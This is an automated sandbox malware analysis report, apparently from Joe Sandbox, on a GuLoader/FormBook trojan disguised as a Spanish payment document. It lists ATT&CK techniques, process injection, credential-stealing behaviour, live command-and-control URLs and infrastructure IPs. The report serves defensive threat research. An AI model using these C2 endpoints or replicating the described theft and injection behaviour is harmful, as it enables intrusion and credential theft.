        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook411
        Process Injection        		NTDS1
        Application Window Discovery        		Distributed Component Object Model1
        Clipboard Data        		5
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Deobfuscate/Decode Files or Information        		LSA Secrets2
        File and Directory Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
        Obfuscated Files or Information        		Cached Domain Credentials4
        System Information Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        DLL Side-Loading        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1410998 Sample: cuenta para pago1.exe Startdate: 18/03/2024 Architecture: WINDOWS Score: 100 30 www.stellerechoes.xyz 2->30 32 xiefly.shop 2->32 34 23 other IPs or domains 2->34 48 Snort IDS alert for network traffic 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 Antivirus detection for URL or domain 2->52 56 4 other signatures 2->56 10 cuenta para pago1.exe 7 55 2->10         started        signatures3 54 Performs DNS queries to domains with low reputation 30->54 process4 file5 28 C:\Users\user\AppData\Local\...\System.dll, PE32 10->28 dropped 13 cuenta para pago1.exe 6 10->13         started        process6 dnsIp7 44 drive.google.com 142.250.65.174, 443, 49803 GOOGLEUS United States 13->44 46 drive.usercontent.google.com 142.251.41.1, 443, 49804 GOOGLEUS United States 13->46 66 Maps a DLL or memory area into another process 13->66 17 YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe 13->17 injected signatures8 process9 process10 19 rasautou.exe 13 17->19         started        dnsIp11 36 154.55.135.138, 80 COGENT-174US United States 19->36 58 Tries to steal Mail credentials (via file / registry access) 19->58 60 Tries to harvest and steal browser information (history, passwords, etc) 19->60 62 Writes to foreign memory regions 19->62 64 3 other signatures 19->64 23 YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe 19->23 injected 26 firefox.exe 19->26         started        signatures12 process13 dnsIp14 38 globalworld-travel.com 109.234.166.81, 49844, 49845, 49846 O2SWITCHFR France 23->38 40 teenpattimasterapp.org 84.32.84.32, 49828, 49829, 49830 NTT-LT-ASLT Lithuania 23->40 42 10 other IPs or domains 23->42

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        cuenta para pago1.exe100%AviraHEUR/AGEN.1361137
        cuenta para pago1.exe47%ReversingLabsWin32.Trojan.Guloader

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll0%ReversingLabs

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://www.globalworld-travel.com/v3ka/?c4qx7JIP=FpC4ctUTedBaFzLAmx5OBNlXlmn8zXWsfuWaCxk5g1trlxnFx7v6dtr2+OePcWisPCE1uISKUROI1tM11v9REV8vlVyrWAjZBU/BkE4yHxOZw90SexyJFP0=&K4W=bb2HuFjPIN0%Avira URL Cloudsafe
        http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
        http://www.dreadbed.com/v3ka/100%Avira URL Cloudmalware
        http://www.b-r-consulting.ch/v3ka/0%Avira URL Cloudsafe
        http://www.xiefly.shop/v3ka/0%Avira URL Cloudsafe
        http://www.kmyangjia.com/v3ka/?c4qx7JIP=TQDhdygg/6k1FrT3duJj1OYD3+fr21m2MLjtTeKUejKDGRun2D/B3i3kqoFCSoO3Pw/E65XWfWwoO6YHx8j54r/FSG1v4bIQ+pjQtA18fUYdL5hShFxGKN0=&K4W=bb2HuFjPIN0%Avira URL Cloudsafe
        http://www.kmyangjia.com/v3ka/0%Avira URL Cloudsafe
        http://www.teenpattimasterapp.org/v3ka/?c4qx7JIP=si7FLVHJ8iWuYVaGSkvjNM53tbCy++USJ5em8DLLO2leI9d5bok8bcXzE4IwU2K08OGpdZcld0QPM+bL/KkbuGKMc/2hsM2YOWzLfNROmTcvWRWJJAUk/s4=&K4W=bb2HuFjPIN0%Avira URL Cloudsafe
        http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
        http://www.wbyzm5.buzz/v3ka/?c4qx7JIP=5DSEd0ATp85KgzdrFCdxbLJep/S6iKShPg/Ik1pbcxCGQNrpEtjfCeVcF04T3qlunhYKINQJ6NoaGwxZUUZob6VNNlK6Td1e1fYChuA8Yf+ZyRKX9C6Zn4U=&K4W=bb2HuFjPIN0%Avira URL Cloudsafe
        http://www.wbyzm5.buzz/v3ka/0%Avira URL Cloudsafe
        http://www.globalworld-travel.com/v3ka/0%Avira URL Cloudsafe
        http://www.clarycyber.com/v3ka/0%Avira URL Cloudsafe
        http://www.clarycyber.com/v3ka/?c4qx7JIP=J4AzjciiJVojUGFuzrYbXLmTAhGMI5W/z8Zu4GWgm/9FzWPCzEiuTS1rwMX9pE5r2vC14B8Wx1zW9w/trsCTKSg2AEld6ylXwESzvlSrq/FwhsHRtw64/YA=&K4W=bb2HuFjPIN0%Avira URL Cloudsafe
        http://www.mvmusicfactory.org/v3ka/100%Avira URL Cloudmalware
        http://www.xiefly.shop/v3ka/?c4qx7JIP=dNjCJvlouN0lJiHjmW6o9laKqXafrGVThPe+fRU03jlQNeIZZXj0HZnF0wYmB7+6kDtWMlD6FZc6rz3hPOSCoZPNCiuZ/LMstJjl/Jmg62t+iuZuHiG5vvg=&K4W=bb2HuFjPIN0%Avira URL Cloudsafe
        http://www.b-r-consulting.ch/v3ka/?c4qx7JIP=bbTJsjbns1egJ9JPkt58MNAjZkRhgchDkV02q5vokHm6S8Qgk9c4A4/rVALt8kpaWPL/RyZRbRAxNoIAik6Ahn7XchDP755TKRWw96XVZ2F1n8YO16SVy/I=&K4W=bb2HuFjPIN0%Avira URL Cloudsafe
        http://www.stellerechoes.xyz/v3ka/?c4qx7JIP=GFfLE978cTjgJhl6jgUZbEhmCeB5iD6iCpjaC2ljIm715WZCCh3yMSG+VpY2eWrvhd9eQ+mGyZHjkiS2WPxVQ0dW/wG4u7YMAwOv3hEtYSzM6b6AuWOV5s4=&K4W=bb2HuFjPIN100%Avira URL Cloudmalware
        http://www.stellerechoes.xyz/v3ka/100%Avira URL Cloudmalware
        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%Avira URL Cloudsafe
        http://www.teenpattimasterapp.org/v3ka/0%Avira URL Cloudsafe
        http://www.mvmusicfactory.org/v3ka/?c4qx7JIP=svB+aVl3D/Qs3yYm3uEZx4nnJil+hT1lh9v7sh/m91IvNeiskalMkbjGhLmhKb4ZrcP91hx+1jPTfxZ9U4bWGVnRMNWmuwE3Nqa36DGpX5UBaKLpwaX6qds=&K4W=bb2HuFjPIN100%Avira URL Cloudmalware

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        xiefly.shop
        		82.180.172.14
        		truetrue
          		unknown
          www.stellerechoes.xyz
          		198.177.123.106
          		truetrue
            		unknown
            parkingpage.namecheap.com
            		91.195.240.19
            		truefalse
              		high
              drive.usercontent.google.com
              		142.251.41.1
              		truefalse
                		high
                www.t3c1srf.site
                		156.232.32.175
                		truefalse
                  		unknown
                  clarycyber.com
                  		62.149.128.45
                  		truetrue
                    		unknown
                    www.dreadbed.com
                    		198.54.117.242
                    		truetrue
                      		unknown
                      k2-ld.wakak1.shop
                      		154.39.248.133
                      		truefalse
                        		unknown
                        www.b-r-consulting.ch
                        		194.191.24.38
                        		truetrue
                          		unknown
                          cname.x172.zbwdj.com
                          		103.146.179.172
                          		truetrue
                            		unknown
                            drive.google.com
                            		142.250.65.174
                            		truefalse
                              		high
                              globalworld-travel.com
                              		109.234.166.81
                              		truetrue
                                		unknown
                                www.wbyzm5.buzz
                                		172.67.130.3
                                		truetrue
                                  		unknown
                                  teenpattimasterapp.org
                                  		84.32.84.32
                                  		truetrue
                                    		unknown
                                    www.xiefly.shop
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.artcitytheatre.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.kmyangjia.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.teenpattimasterapp.org
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.p65cq675did.shop
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.clarycyber.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.globalworld-travel.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.mvmusicfactory.org
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.midwestnationalflying.com
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.sengogkaffe.info
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.mehr-neukunden.online
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown

                                                          Contacted URLs

                                                          NameMaliciousAntivirus DetectionReputation
                                                          http://www.dreadbed.com/v3ka/true
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.globalworld-travel.com/v3ka/?c4qx7JIP=FpC4ctUTedBaFzLAmx5OBNlXlmn8zXWsfuWaCxk5g1trlxnFx7v6dtr2+OePcWisPCE1uISKUROI1tM11v9REV8vlVyrWAjZBU/BkE4yHxOZw90SexyJFP0=&K4W=bb2HuFjPINtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.xiefly.shop/v3ka/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.wbyzm5.buzz/v3ka/?c4qx7JIP=5DSEd0ATp85KgzdrFCdxbLJep/S6iKShPg/Ik1pbcxCGQNrpEtjfCeVcF04T3qlunhYKINQJ6NoaGwxZUUZob6VNNlK6Td1e1fYChuA8Yf+ZyRKX9C6Zn4U=&K4W=bb2HuFjPINtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.kmyangjia.com/v3ka/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.kmyangjia.com/v3ka/?c4qx7JIP=TQDhdygg/6k1FrT3duJj1OYD3+fr21m2MLjtTeKUejKDGRun2D/B3i3kqoFCSoO3Pw/E65XWfWwoO6YHx8j54r/FSG1v4bIQ+pjQtA18fUYdL5hShFxGKN0=&K4W=bb2HuFjPINtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.b-r-consulting.ch/v3ka/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.teenpattimasterapp.org/v3ka/?c4qx7JIP=si7FLVHJ8iWuYVaGSkvjNM53tbCy++USJ5em8DLLO2leI9d5bok8bcXzE4IwU2K08OGpdZcld0QPM+bL/KkbuGKMc/2hsM2YOWzLfNROmTcvWRWJJAUk/s4=&K4W=bb2HuFjPINtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.clarycyber.com/v3ka/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.mvmusicfactory.org/v3ka/true
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.b-r-consulting.ch/v3ka/?c4qx7JIP=bbTJsjbns1egJ9JPkt58MNAjZkRhgchDkV02q5vokHm6S8Qgk9c4A4/rVALt8kpaWPL/RyZRbRAxNoIAik6Ahn7XchDP755TKRWw96XVZ2F1n8YO16SVy/I=&K4W=bb2HuFjPINtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.wbyzm5.buzz/v3ka/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.xiefly.shop/v3ka/?c4qx7JIP=dNjCJvlouN0lJiHjmW6o9laKqXafrGVThPe+fRU03jlQNeIZZXj0HZnF0wYmB7+6kDtWMlD6FZc6rz3hPOSCoZPNCiuZ/LMstJjl/Jmg62t+iuZuHiG5vvg=&K4W=bb2HuFjPINtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.clarycyber.com/v3ka/?c4qx7JIP=J4AzjciiJVojUGFuzrYbXLmTAhGMI5W/z8Zu4GWgm/9FzWPCzEiuTS1rwMX9pE5r2vC14B8Wx1zW9w/trsCTKSg2AEld6ylXwESzvlSrq/FwhsHRtw64/YA=&K4W=bb2HuFjPINtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.stellerechoes.xyz/v3ka/?c4qx7JIP=GFfLE978cTjgJhl6jgUZbEhmCeB5iD6iCpjaC2ljIm715WZCCh3yMSG+VpY2eWrvhd9eQ+mGyZHjkiS2WPxVQ0dW/wG4u7YMAwOv3hEtYSzM6b6AuWOV5s4=&K4W=bb2HuFjPINtrue
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.globalworld-travel.com/v3ka/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.stellerechoes.xyz/v3ka/true
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.teenpattimasterapp.org/v3ka/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.mvmusicfactory.org/v3ka/?c4qx7JIP=svB+aVl3D/Qs3yYm3uEZx4nnJil+hT1lh9v7sh/m91IvNeiskalMkbjGhLmhKb4ZrcP91hx+1jPTfxZ9U4bWGVnRMNWmuwE3Nqa36DGpX5UBaKLpwaX6qds=&K4W=bb2HuFjPINtrue
                                                          • Avira URL Cloud: malware
                                                          		unknown

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.cuenta para pago1.exe, 00000002.00000001.3959353601.0000000000649000.00000020.00000001.01000000.00000005.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://drive.usercontent.google.com/cuenta para pago1.exe, 00000002.00000003.4056696301.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4096362930.00000000046A4000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4096216292.000000000469A000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4056969680.00000000046A4000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4095703343.00000000046A6000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000002.4199073124.00000000046A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://nsis.sf.net/NSIS_ErrorErrorcuenta para pago1.exe, 00000000.00000000.3658397167.0000000000409000.00000008.00000001.01000000.00000003.sdmp, cuenta para pago1.exe, 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmp, cuenta para pago1.exe, 00000002.00000000.3957453711.0000000000409000.00000008.00000001.01000000.00000003.sdmpfalse
                                                              		high
                                                              http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDcuenta para pago1.exe, 00000002.00000001.3959353601.0000000000626000.00000020.00000001.01000000.00000005.sdmpfalse
                                                                		high
                                                                http://www.gopher.ftp://ftp.cuenta para pago1.exe, 00000002.00000001.3959353601.0000000000649000.00000020.00000001.01000000.00000005.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://drive.google.com/cuenta para pago1.exe, 00000002.00000002.4198736310.0000000004628000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214cuenta para pago1.exe, 00000002.00000001.3959353601.0000000000649000.00000020.00000001.01000000.00000005.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown

                                                                  World Map of Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public IPs

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  142.251.41.1
                                                                  		drive.usercontent.google.comUnited States
                                                                  		15169GOOGLEUSfalse
                                                                  142.250.65.174
                                                                  		drive.google.comUnited States
                                                                  		15169GOOGLEUSfalse
                                                                  194.191.24.38
                                                                  		www.b-r-consulting.chSwitzerland
                                                                  		1836GREENgreenchAGAutonomousSystemEUtrue
                                                                  84.32.84.32
                                                                  		teenpattimasterapp.orgLithuania
                                                                  		33922NTT-LT-ASLTtrue
                                                                  103.146.179.172
                                                                  		cname.x172.zbwdj.comunknown
                                                                  		136950HIITL-AS-APHongKongFireLineNetworkLTDHKtrue
                                                                  156.232.32.175
                                                                  		www.t3c1srf.siteSeychelles
                                                                  		8100ASN-QUADRANET-GLOBALUSfalse
                                                                  91.195.240.19
                                                                  		parkingpage.namecheap.comGermany
                                                                  		47846SEDO-ASDEfalse
                                                                  172.67.130.3
                                                                  		www.wbyzm5.buzzUnited States
                                                                  		13335CLOUDFLARENETUStrue
                                                                  82.180.172.14
                                                                  		xiefly.shopDenmark
                                                                  		29100BROADCOMDKtrue
                                                                  198.177.123.106
                                                                  		www.stellerechoes.xyzUnited States
                                                                  		395681FINALFRONTIERVGtrue
                                                                  109.234.166.81
                                                                  		globalworld-travel.comFrance
                                                                  		50474O2SWITCHFRtrue
                                                                  198.54.117.242
                                                                  		www.dreadbed.comUnited States
                                                                  		22612NAMECHEAP-NETUStrue
                                                                  154.39.248.133
                                                                  		k2-ld.wakak1.shopUnited States
                                                                  		174COGENT-174USfalse
                                                                  154.55.135.138
                                                                  		unknownUnited States
                                                                  		174COGENT-174USfalse
                                                                  62.149.128.45
                                                                  		clarycyber.comItaly
                                                                  		31034ARUBA-ASNITtrue

                                                                  General Information

                                                                  Joe Sandbox version:40.0.0 Tourmaline
                                                                  Analysis ID:1410998
                                                                  Start date and time:2024-03-18 15:04:16 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 17m 4s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                  Run name:Suspected Instruction Hammering
                                                                  Number of analysed new started processes analysed:8
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:2
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:cuenta para pago1.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@7/10@30/15
                                                                  EGA Information:
                                                                  • Successful, ratio: 100%
                                                                  HCA Information:
                                                                  • Successful, ratio: 91%
                                                                  • Number of executed functions: 59
                                                                  • Number of non-executed functions: 256
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                  Warnings

                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, VSSVC.exe, svchost.exe
                                                                  • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • VT rate limit hit for: cuenta para pago1.exe

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  15:07:41API Interceptor26777253x Sleep call for process: rasautou.exe modified

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  194.191.24.38rcuentaparapago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.b-r-consulting.ch/v3ka/?Tnn=Sxv4&1T=bbTJsjbns1egJ9JAh959MNYhMlBhishDkV02q5vokHm6S8Qgk9c4A4/rVALt8kpaWPL/RyZRbRAxNoIAik6Ahn7XchDP755TKRWw9+PVZyBlhOQ45aXm/eU=
                                                                  cuenta para pago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.b-r-consulting.ch/v3ka/
                                                                  Transferencia de pago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.b-r-consulting.ch/v3ka/
                                                                  cuenta para pago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.b-r-consulting.ch/v3ka/
                                                                  factura pendiente.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.b-r-consulting.ch/v3ka/
                                                                  factura-022899.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.b-r-consulting.ch/v3ka/
                                                                  factura-022853.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.b-r-consulting.ch/v3ka/
                                                                  factura-022853.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.b-r-consulting.ch/v3ka/
                                                                  factura pendiente.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.b-r-consulting.ch/v3ka/
                                                                  Recibo de transferenc#U00eda.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.b-r-consulting.ch/v3ka/
                                                                  84.32.84.32Grundforbedre39.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.meliorras.com/m9so/
                                                                  iU3WGoA77BdiFdA.exeGet hashmaliciousFormBookBrowse
                                                                  • www.adilosk.shop/ns03/?t8o4n4P=AosJMqNKd7Rtr+7kStuqowEH7RbQp+KK2+r79Yxxw0f1QGTDBq2FkLKgkhN5vuWLBRjLKeslyQ==&jPm0=Klh8
                                                                  PO-31789R3WY-10_docx.exeGet hashmaliciousFormBookBrowse
                                                                  • www.gksscje.online/m21s/?v4=Cj6PF&9rIpdJQP=/lLSHdmLeiMPDetofN7Z6lDaWKdSDRGfvhAIJ/vGN+OAihoy/KUQLgQrGoqNPq2feNZ5
                                                                  PO663636.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                  • www.adilosk.shop/hy07/?CPp=gdoXZHeHF&pFQP-nBH=DfzpuJ12s8Tt+Vq+x1MvLRXRdzfgRVDyy0IoVhzBehBHNITUvhzHBr0ZFKm70P49LC8Pdrq2bg==
                                                                  9nncBfTB8Kjm7ge.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                  • www.taifengtechnologyservice.com/ns03/?DTdTP=hQJO7rrVsFaND9VxqIhBPO08Nab7fckuKdqBNrIsCWjHF6Cj2JZqMVNmSPc5hKHUY9ZD&jhIpS=Vhct
                                                                  Total Energies RFQ.exeGet hashmaliciousFormBookBrowse
                                                                  • www.taketechai.com/cgf3/
                                                                  rcuentaparapago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.teenpattimasterapp.org/v3ka/?1T=si7FLVHJ8iWuYVaJX0viNMh14aSy8OUSJ5em8DLLO2leI9d5bok8bcXzE4IwU2K08OGpdZcld0QPM+bL/KkbuGKMc/2hsM2YOWzLfJJOmXY/Qje/FgRXyNk=&Tnn=Sxv4
                                                                  Ckswuxhusyynxl.exe.Direct download.exeGet hashmaliciousDeal Ply, DBatLoader, FormBookBrowse
                                                                  • www.xn--bb55rtp-9va2p.store/3rwr/
                                                                  PO 1402-16 AH.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                  • www.cityrentsatruck.com/e25x/
                                                                  cuenta para pago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.teenpattimasterapp.org/v3ka/

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  parkingpage.namecheap.comGrundforbedre39.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 91.195.240.19
                                                                  gMCSnfJRqp.exeGet hashmaliciousFormBookBrowse
                                                                  • 91.195.240.19
                                                                  CATALOG LISTs#U180ex#U180el#U180ex#U180e..exeGet hashmaliciousFormBookBrowse
                                                                  • 91.195.240.19
                                                                  9nncBfTB8Kjm7ge.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                  • 91.195.240.19
                                                                  Interviewed.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 91.195.240.19
                                                                  Total Energies RFQ.exeGet hashmaliciousFormBookBrowse
                                                                  • 91.195.240.19
                                                                  rcuentaparapago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 91.195.240.19
                                                                  PO 1402-16 AH.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                  • 91.195.240.19
                                                                  cuenta para pago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 91.195.240.19
                                                                  PI for #13288.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                  • 91.195.240.19
                                                                  www.stellerechoes.xyzrcuentaparapago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 198.177.123.106
                                                                  cuenta para pago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 198.177.123.106
                                                                  Transferencia de pago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 198.177.123.106
                                                                  cuenta para pago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 198.177.123.106
                                                                  factura pendiente.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 198.177.123.106
                                                                  factura-022899.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 198.177.123.106
                                                                  factura-022853.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 198.177.123.106
                                                                  factura-022853.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 198.177.123.106
                                                                  factura pendiente.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 198.177.123.106
                                                                  Recibo de transferenc#U00eda.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 198.177.123.106

                                                                  ASNs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  ASN-QUADRANET-GLOBALUSGrundforbedre39.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 156.232.32.175
                                                                  REF_RFQ#H4_Y230325003_Nitto_Kohki_Materials_products s#U180ex#U180el#U180ex#U180e..exeGet hashmaliciousRemcosBrowse
                                                                  • 66.63.162.155
                                                                  yzIY5KFJSu.elfGet hashmaliciousMiraiBrowse
                                                                  • 104.223.82.201
                                                                  http://204.44.125.68/mcqef/yPXpC.txtGet hashmaliciousUnknownBrowse
                                                                  • 204.44.125.68
                                                                  5mzNYOqDim.elfGet hashmaliciousMiraiBrowse
                                                                  • 154.205.102.18
                                                                  DHL-LHER0006981753.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 104.247.165.99
                                                                  3910051081_GNC2024000000430.vbsGet hashmaliciousAgentTeslaBrowse
                                                                  • 104.247.165.99
                                                                  SecuriteInfo.com.Win32.PWSX-gen.16660.32286.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 104.247.165.99
                                                                  PO CBV87654468.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                  • 107.150.18.202
                                                                  063837646WAYBILLMAR24.exeGet hashmaliciousRedLineBrowse
                                                                  • 156.239.52.68
                                                                  GREENgreenchAGAutonomousSystemEUxcBienFkvE.elfGet hashmaliciousMiraiBrowse
                                                                  • 81.221.46.100
                                                                  ZzjhTEVx80.elfGet hashmaliciousMiraiBrowse
                                                                  • 146.228.201.189
                                                                  rcuentaparapago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 194.191.24.38
                                                                  cuenta para pago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 194.191.24.38
                                                                  Transferencia de pago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 194.191.24.38
                                                                  cuenta para pago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 194.191.24.38
                                                                  vJSyCK4is2.elfGet hashmaliciousMiraiBrowse
                                                                  • 195.49.121.148
                                                                  factura pendiente.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 194.191.24.38
                                                                  factura-022899.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 194.191.24.38
                                                                  factura-022853.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 194.191.24.38
                                                                  NTT-LT-ASLTGrundforbedre39.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 84.32.84.32
                                                                  gMCSnfJRqp.exeGet hashmaliciousFormBookBrowse
                                                                  • 84.32.84.92
                                                                  iU3WGoA77BdiFdA.exeGet hashmaliciousFormBookBrowse
